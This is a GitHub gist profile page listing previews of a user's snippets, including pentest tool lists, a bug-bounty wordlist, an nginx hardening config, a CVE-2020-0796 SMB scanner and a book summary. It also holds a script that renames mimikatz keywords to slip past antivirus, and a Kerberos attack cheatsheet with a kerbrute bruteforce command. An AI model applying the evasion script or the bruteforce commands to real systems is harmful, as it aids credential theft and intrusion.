Skip to content

Instantly share code, notes, and snippets.

View gnebbia's full-sized avatar

gnebbia gnebbia

146 followers · 13 following
  • Sweden
View GitHub Profile
@gnebbia
gnebbia / scapy.txt
Created November 5, 2021 12:42
scapy tutorial
# scapy
# scapy is cool and works flawlessly
# If you ever think about using pyshark, as of september 2020 don't!
# pyshark, although supporting a lot of protocols, has a lot of bugs.
# NOTE: A high level network sniffer reporting some stats is YAS:
# https://github.com/redcode-labs/YAS
## Getting Help
@gnebbia
gnebbia / pt_to_install.txt
Last active September 23, 2021 21:54
Pentest/CTF Tools
# Tools
nmap
metasploit
wpscan
burpsuite
rustscan
python
hydra
ncrack
john
@gnebbia
gnebbia / gemini-resources.txt
Created September 23, 2021 08:02
A collection of interesting gemini resources
# Cool Gemini Capsules
# Docs about Gemini and useful resources (Start Here)
gemini://gemini.circumlunar.space
gemini://gemini.circumlunar.space/docs/faq.gmi
gemini://geminiquickst.art/
# Search Engines
gemini://geminispace.info
@gnebbia
gnebbia / bug-bounty-wordlist.txt
Created April 16, 2021 09:02 — forked from EdOverflow/bug-bounty-wordlist.txt
Good short wordlist for directory bruteforcing.
cgi-bin
images
admin
includes
modules
templates
cache
media
js
language
@gnebbia
gnebbia / nginx.conf
Created March 17, 2021 01:30 — forked from plentz/nginx.conf
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@gnebbia
gnebbia / mimikatz_obfuscator.sh
Created September 17, 2020 09:43 — forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@gnebbia
gnebbia / CleanArchitecture.md
Created September 10, 2020 11:50 — forked from ygrenzinger/CleanArchitecture.md
Summary of Clean Architecture by Robert C. Martin

Summary of book "Clean Architecture" by Robert C. Martin

Uncle Bob, the well known author of Clean Code, is coming back to us with a new book called Clean Architecture which wants to take a larger view on how to create software.

Even if Clean Code is one of the major book around OOP and code design (mainly by presenting the SOLID principles), I was not totally impressed by the book.

Clean Architecture leaves me with the same feeling, even if it's pushing the development world to do better, has some good stories and present robust principles to build software.

The book is build around 34 chapters organised in chapters.

@gnebbia
gnebbia / check-smb-v3.11.sh
Created May 13, 2020 00:01 — forked from nikallass/check-smb-v3.11.sh
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@gnebbia
gnebbia / kerberos_attacks_cheatsheet.md
Created February 20, 2020 19:32 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@gnebbia
gnebbia / README.md
Created January 4, 2020 21:39 — forked from hofmannsven/README.md
Command Line Cheatsheet